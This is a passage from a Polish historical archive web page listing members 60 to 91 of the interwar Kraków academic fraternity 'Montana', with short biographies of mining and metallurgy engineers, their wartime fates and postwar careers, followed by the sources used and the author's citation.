 60. Stanisław (Stefan?) Piotrowski, student UJ, akt. 1930-31, inż., w 1938 w Katowicach
 61. Jan Pochwalski, mgr, w 1938 w Zarządzie Miejskim w Chrzanowie
 62. Stefan Poradowski, c. 1938, akt. 1938-39
 63. Brosniław Potuczek, student WSH, mgr, w 1938 w Krakowie

  Janusz Przedpełski, lata 30-te.

 64. Janusz Przedpełski, (23 maja 1907 w Warszawie - 8 stycznia 1970 w Krakowie) absolwent Gimnazjum im. Adama Mickiewicza w Warszawie, student i absolwent Wydziału Górniczego AG 1926-33, akt. 1930-32, prezes sem. zim. 1931/32, wiceprezes Krakowskiego Koła Międzykorporacyjnego sem let. 1929/30, po studiach m.in. pracownik kopalni “Giesche” w Nikiszowicach, kopalni “Artur” w Sierszy, kopalni “Anna” w Pszowie, “Ema” w Radlinie, w czasie wojny dyrektor Fabryki i Kamieniołomu Marmurów w Kielcach, dyrektor kopalni “Michał” w Michałowicach 1945-46, inspektor kopalń Bytomskiego Zjednoczenia Przemysłu Węglowego 1946-48, oskarżony o udział w tajnej organizacji na rzecz obalenia ustroju socjalistycznego, skazany na sześć lat więzienia i konfiskatę majątku, zwolniony w 1953, starszy inspektor techniczny i starszy inspektor górniczy 1953-57, kierownik działu ogólnotechnicznego 1957-60 oraz kierownik ośrodka informacji ekonomicznej 1960-64 Przedsiębiorstwa Robót Górniczych w Bytomiu

 65. Wacław Regulski, (31 sierpnia 1907 w Wieczynie - prawd. po 1979) s. Piotra, absolwent Gimnazjum Humanistycznego im. Stanisława Staszica w Chodzieży, student i absolwent Wydziału Górniczego 1930-45, c. 1930, akt. 1930-38, wiceprezes 1938, pracował między innymi jako: sztygar w kopalni “Jowisz” w Wojkowicach Komorne 1940-45, kierownik oddziału Instytutu Naukowo-Badawczego w Katowicach 1946-48, pracownik naukowo-techniczny Głównego Instytutu Paliw w Katowicach 1948-50, kierownik działu badań Instytutu Mechanizacji Górnictwa w Katowicach 1951-54, docent i zastępca dyrektora w Zakładach Konstrukcyjno-Mechanizacyjnych w Katowicach 1958-64, od 1950 pracownik Wydziału Górniczego PŚ, m.in. od 1953 kierownik Katedry do Urabiania i Ładowania, prof. nadzw. 1964, dziekan Wydziału Górniczego 1964-66, prorektor 1966-71, od 1971 na emeryturze
 66. Władysław Rzońca (Rzonca), ( - 1980 w Krakowie) dr praw, w 1931 pracownik Fabryki Wyrobów Azotowych w Mościcach, w 1938 w Krakowie
 67. Sewryn Sadowski, por., w latach 30-tych w III Pułku Saperów w Wilnie
 68. Władysław Sadowski, (9 luty 1911 w Klimonotowie - 5 września 1939) s. Adama, absolwent Gimnazjum Bolesława Prusa w Sosnowcu, student i absolwent Wydziału Górniczego AG 1932-38, akt. 1938-39, po studiach pracownik kopalni “Emma” w Radlinie 1938-39, w wojnie obronnej 1939 w 5 Pułku Saperów Kolejowych, poległ
 69. Jerzy Serafin, ( - po 1945) c. 1938, akt. 1938-39
 70. Józef Sido, (17 luty 1903 w Stojance - po 1968) s. Jakóba, absolwent II Gimnazjum w Przemyślu, student i absolwent Wydziału Górniczego AG 1926-37, akt. 1930-31, po studiach m.in. kierownik Warsztatów Lotniczych w Krakowie 1936-39, pracownik kopalni “Jan” w Nowej Rudzie, dyrektor kopalni “Nowa Ruda” 1948-53, inspektor kopalń w Dolnośląskim Zjednoczeniu Przemysłu Węglowego w Wałbrzychu 1953, w Centralnym Zarząd Kopalń Rud Żelaza w Częstochowie 1953-57, w Zabrzańskim Zjednoczeniu Przemysłu Węglowego 1958-63, w Jaworznicko-Mikołowskim Zjednoczeniu Przemysłu Węglowego 1963-68, od 1968 na emeryturze
 71. Witold Sobiepan, (29 września 1910 w Tomaszowie Mazowieckim - po 1976) s. Hipolita, student i absolwent Wydziału Hutniczego AG 1930-37, po studiach m.in. pracownik Huty “Laura” w Siemianowicach oraz Huty “Florian” w Świętochłowicach, kierownik odlewni Zakładu Świerczewskiego w Elblągu 1945-50, starszy projektant “Biprohutu” w Gliwicach 1950-76, od 1976 na emeryturze
 72. Janusz Stefanowicz, student i absolwent (mgr) WSH, akt. 1929-31, skarbnik Montany i Krakowskiego Koła Międzykorporacyjnego sem. let. 1929/30, w 1938 w Warszawie
 73. Stanisław Maria Stobiecki, (6 kwietnia 1905 w Krakowie - wrzesień 1939 w Warszawie) s. Stefana, absolwent IV Gimnazjum im. H. Sienkiewicza w Krakowie, student i absolwent Wydziału Górniczego AG 1924-31, po studiach pracował w kopalni “Sobieski” w Jaworznie, jako nauczyciel w Szkole Górniczej w Dąbrowie Górniczej 1933-37, radca Departamentu Górnictwa w Ministerstwie Przemysłu i Handlu w Warszawie, poległ w wojnie obronnej 1939 w obronie Warszawy w okolicach mostu Poniatowskiego
 74. Emanuel Sukiennik, (1 sierpnia 1902 w Łazach w Czechach - po 1968) s. Józefa, absolwent Gimnazjum Realnego w Orłowej, student Wyższej Szkoły Handlowej w Krakowie, student i absolwent Wydziału Górniczego 1922-29, po studiach pracownik m.in. Szkoły Górniczej w Tarnowskich Górach oraz Szkoły Górniczej w Katowicach 1932-39, kierownik ruchu kopalni Rudy Żelaza “Janina” w Żychowicach 1939-45, dyrektor Zjednoczenia Przedsiębiorstw Wiertniczo-Górniczych 1945-47, inż. specjalista i doradca Bytomskiego Zjednoczenia Przemysłu Węglowego 1947-50, główny inż. wiertnictwa i geologii w Centralnym Zarządzie Budowy Kopalń w Katowicach 1950-53, główny inż. miernictwa i geologii w Jaworznicko-Mikołowskim Zjednoczeniu Przemysłu Węglowego 1953-68, od 1968 na emeryturze
 75. Jan Surowiec, akt. 1938-39, wiceprezes 1938, wiceprezes zewn. sem. let. 1938/39, sekretarz Krakowskiego Koła Międzykorporacyjnego sem. zim. 1938/39
 76. Herbert Szczepański, c. 1938, akt. 1938-39, sekretarz wewn. sem. let. 1938/39
 77. Zdzisław Szymiczek, student i absolwent Wydziału Górniczego AG, akt. 1930-31, w 1938 por. w I Pułku Radiotelegraficznym w Zegrzu
 78. Kazimierz Trzeciak, student i absolwent (mgr) UJ, akt. 1930-31, w 1938 w Krakowie
 79. Stefan Jan Tucholski, (29 sierpnia 1910 w Zagórzu - prawd. po 1979) s. Antoniego, absolwent Gimnazjum im. Stanisława Staszica w Sosnowcu, student i absolwent Wydziału Górniczego 1931-37, po studiach pracownik m.in. kopalni “Niwka” w Niwce, “Milowice” w Milowicach, “Andrzej” w Brzeszczach, po wojnie kierownik działu planowania produkcji w Dąbrowskim Zjednoczeniu Przemysłu Węglowego 1947-50, główny inż. planista 1950-67 oraz główny inż. ds. nowej techniki 1967-68 w kopalni “Kazimierz-Juliusz” w Kazimierzu Sosnowieckim, od 1968 na emeryturze

  Konstanty Tuchołka, 1938 r.

 80. Konstanty Tuchołka, (23 czerwca 1901 w Poznaniu - sierpień 1941 w Auschwitz) s. Franciszka, student i absolwent Wydziału Górniczego AG 1921-35, akt. 1929-31, olderman sem. zim. 1929/30, prezes sem. let. 1930/31, inż. w kopalni “Polska” w Świętochłowicach 1935-37, kierownik działu robót górniczych w kopalni “Mysłowice” w Mysłowicach 1937, kierownik robót górniczych kopalni “Siemianowice” w Siemianowicach Śląskich 1937-39, uczestnik wojny obronnej 1939, sztygar w kopalni rudy żelaza w Poraju 1940-41, w konspiracji antyniemieckiej, aresztowany 3 marca 1941 przez Gestapo, zesłany do Auschwitz, tam stracony w egzekucji

 81. Mirosław Tylusiński, (22 maja 1912 w Kielcach - prawd. po 1979), s. Zygmunta, absolwent Gimnazjum im. J. Śniadeckiego w Kielcach, student i absolwent Wydziału Hutniczego AG 1930-38, c. 1930, akt. 1930-31, pracownik Huty “Ostrowiec” w Ostrowcu Świętokrzyskim 1939-44, kierownik walcowni Huty “Batory” w Chorzowie 1945-49, główny walcownik Centralnego Zarządu Przemysłu Stali Specjalnych w Katowicach 1950-58, główny walcownik 1959-70 oraz od 1970 główny specjalista ds. walcowni gorących w Hucie “Warszawa” w Warszawie
 82. Jerzy Węgrowski, student WSH, c. 1930, akt. 1930-31
 83. Władysław Winnicki, (15 lipca 1906 w Bukaczowcach - po 1970), s. Józefa, absolwent Gimnazjum Matematyczno-Przyrodniczego w Stanisławowie, student i absolwent Wydziału Górniczego 1926-36, akt. 1930-32, gospodarz sem. let. 1930/31, gospodarz sem. zim. 1931/32, referent techniczny Okręgowego Urzędu Górniczego 1936-39 oraz starszy referendarz Wojewódzkiego Urzędu Górniczego we Lwowie 1939, sztygar w kopalni soli potasowych w Kałuszu 1940-44, dyrektor Zakładów Wapienniczych w Wojcieszowie 1945-48, główny inspektor techniczny Kamieniołomów Śląskich w Świdnicy 1949-51, kierownik Centralnego Zarządu Kamieniołomów i Klinkierni Drogowych we Wrocławiu 1951-54, dyrektor Zakładów Soli Potasowych w Kłodawie 1954-59, zawiadowca w Inowrocławskich Kopalniach Soli 1959-70
 84. Antoni Marian Wiśniowski, (22 maja 1907 w Chrzanowie - prawd. po 1979) s. Kazimierza, absolwent III Gimnazjum im. J. Sobieskiego, student i absolwent Wydziału Górniczego AG 1926-33, akt. 1929-31, wiceprezes Montany oraz sekretarz Krakowskiego Koła Międzykorporacyjnego sem. let. 1929/30, po studiach pracownik m.in. kopalni “Orzeł Biały” w Brzezinach Śląskich, kopalni “Saturn” w Czeladzi, kierownik Zakładu Robót Górniczych w Sosnowcu 1950-52, naczelny inż. Przedsiębiorstwa Robót Górniczych w Sosnowcu 1953-59, inspektor kopalń i kierownik postępu technicznego w Zjednoczeniu Budownictwa Górniczego w Katowicach 1959-67, od 1968 na emeryturze
 85. Wacław Witeszczak, dr, w 1938 w Zakopanym
 86. Jan Wojciechowski, akt. 1938-39
 87. Michał Wowk (Wowik ?), inż., w latach 30-tych w Warszawie
 88. Janusz Wroczyński, student i absolwent WSH, c. 1930, akt. 1930-32, skarbnik sem. zim. 1931/32, w 1938 pracował w Izbie Przemysłowo-Handlowej w Sosnowcu
 89. Kazimierz Wrzesień, (5 listopada 1909 w Środuli - prawd. po 1979) s. Antoniego, absolwent Gimnazjum Matematyczno-Przyrodniczego Zrzeszenia Rodziców w Sosnowcu, student i absolwent Wydziału Hutniczego AG 1932-47, akt. 1938, uczestnik wojny obronnej 1939, w obozie jenieckim II C w Woldenburgu 1939-45, szef wydziału walcowni blachy grubej Huty “Batory” w Chorzowie 1945-50, główny inż. 1950-51 i 1952-54 oraz naczelny dyrektor 1951-52 Huty im. Bieruta w Częstochowie, szef produkcji Huty “Kościuszko” w Chorzowie 1954-55, kierownik Zakładu Walcownictwa Politechniki Częstochowskiej 1951-55, dyrektor zakładu hutniczego w Hucie Stalowa Wola 1955-64, ekspert oddziału metalurgii żelaza RWPG w Moskwie 1964-68, dyrektor ds. produkcji Huty “Kościuszko” w Chorzowie 1968-72, kierownik Huty “Katowice” 1972-77, od 1977 na emeryturze
 90. Mieczysław Zacharyasz, (18 kwietnia 1914 w Detroit - 15 października 1986 w Chorzowie) s. Zdzisława i Felicji z d. Lichocka, absolwent IV Gimnazjum im. H. Sienkiewicza w Krakowie, student i absolwent Wydziału Górniczego AG 1933-47, akt. 1938-39, wiceprezes wewn. sem. let. 1938/39, po studiach pracownik m.in. zastępca kierownika Salina Barycz 1939-45, później pracownik kopalni “Polska” w Świętochłowicach 1945-50, w tym naczelny inż., zastępca inż. naczelnego kopalni “Prezydent” w Chorzowie 1950-58, inspektor kopalń Dąbrowskiego Zjednoczenia Przemysłu Węglowego w Sosnowcu 1958-59, inspektor kopalń Bytomskiego Zjednoczenia Przemysłu Węglowego 1959-71, główny inż. inwestycji kopalni “Bytom” w Bytomiu 1971, od 1971 na emeryturze, członek NOT, Stowarzyszenia Inżynierów i Techników oraz Stowarzyszenia “PAX”, pochowany na Cmentarzu Kościoła św. Jadwigi w Chorzowie

 91. Jan Żal, (1906/09 we wsi Grzymała w pow. Stopnica na Podkarpaciu - ok. 1978) student AG, akt. 1930-31, w czasie okupacji związany z partyzantką Batalionów Chłopskich, wraz z rodziną odznaczony medalem Sprawiedliwy Wśród Narodów Świata, po wojnie mieszkał i pracował w Łodzi, prawd. jako nauczyciel w szkole średniej

Pieczęć Montany, 1931 r.

Listę członków opracowano na podstawie:

1) “Montana” Polska Korporacja Akademicka, (w:) Biuletyn Krakowskiego Koła Międzykorporacyjnego. Za semestr letni roku akademickiego 1930-1931, Kraków 1931, s. 26 i n.,
2) Montana Polska Korporacja Akademicka, (w:) Biuletyn Krakowskiego Koła Międzykorporacyjnego. Za semestr letni roku akademickiego 1938-1939, Kraków 1938, s. 17 i n.,
3) Julian Sulima-Samujłło, Księga wychowanków i wychowawców Akademii Górniczej w Krakowie 1919-1949, Kraków 1979,
4) materiałów archiwalnych z Archiwum Korporacyjnego,
5) wydawnictw encyklopedycznych i biograficznych oraz rozmów z rodzinami członków Korporacji Montana.

Opracowanie: Bartłomiej P. Wróblewski
Opublikowano: 12 IX 2007 r.
Ostatnia zmiana: 18 I 2015 r.

Propozycja cytowania: Bartłomiej P. Wróblewski, Polska Korporacja Akademicka Montana (Kraków), (na:) www.archiwumkorporacyjne.pl, stan 18 I 2015 r.

O Archiwum  |  Muzeum Korporacyjne  |  Aktualności  |  Kontakt  |   English © Archiwum Korporacyjne     Nota prawna  |  Mapa serwisu  | 
Szukaj    »
created by { re.PUBLIK }